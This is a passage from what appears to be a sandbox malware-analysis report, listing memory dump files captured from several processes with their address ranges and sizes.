                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4.6MB

                                                                                                                                                                                      • memory/5948-1775-0x00000000057F0000-0x00000000058D2000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        904KB

                                                                                                                                                                                      • memory/5948-4674-0x0000000009F90000-0x0000000009FCC000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        240KB

                                                                                                                                                                                      • memory/5948-4672-0x0000000009D10000-0x0000000009D5B000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        300KB

                                                                                                                                                                                      • memory/5948-4671-0x00000000099C0000-0x0000000009D10000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.3MB

                                                                                                                                                                                      • memory/5948-4670-0x0000000009950000-0x00000000099B4000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        400KB

                                                                                                                                                                                      • memory/5948-4662-0x00000000087E0000-0x0000000008B0C000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.2MB

                                                                                                                                                                                      • memory/5948-4661-0x00000000071B0000-0x000000000740E000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.4MB

                                                                                                                                                                                      • memory/5948-4669-0x0000000009390000-0x000000000940A000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        488KB

                                                                                                                                                                                      • memory/5948-4623-0x0000000005A40000-0x0000000005AB2000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        456KB

                                                                                                                                                                                      • memory/5948-1773-0x0000000000400000-0x00000000004D0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        832KB

                                                                                                                                                                                      • memory/5948-1774-0x0000000003090000-0x0000000003098000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        32KB

                                                                                                                                                                                      • memory/5948-4675-0x0000000009ED0000-0x0000000009EF0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        128KB

                                                                                                                                                                                      • memory/5960-5248-0x0000000000CA0000-0x0000000001141000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4.6MB

                                                                                                                                                                                      • memory/5960-5246-0x0000000000CA0000-0x0000000001141000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4.6MB

                                                                                                                                                                                      • memory/6576-4826-0x0000000008220000-0x000000000826B000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        300KB

                                                                                                                                                                                      • memory/6576-4817-0x0000000000B50000-0x0000000000BDC000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        560KB

                                                                                                                                                                                      • memory/7056-4827-0x00000000067C0000-0x0000000006B10000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.3MB

                                                                                                                                                                                      • memory/8096-5092-0x0000000000090000-0x0000000000740000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.7MB

                                                                                                                                                                                      • memory/8096-4823-0x0000000000090000-0x0000000000740000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.7MB

                                                                                                                                                                                      • memory/8128-4648-0x0000000008A80000-0x0000000008B14000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        592KB

                                                                                                                                                                                      • memory/8128-4649-0x0000000008A10000-0x0000000008A2A000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        104KB

                                                                                                                                                                                      • memory/8128-4650-0x0000000008B20000-0x0000000008B42000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        136KB

                                                                                                                                                                                      • memory/8128-4632-0x0000000007340000-0x0000000007690000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.3MB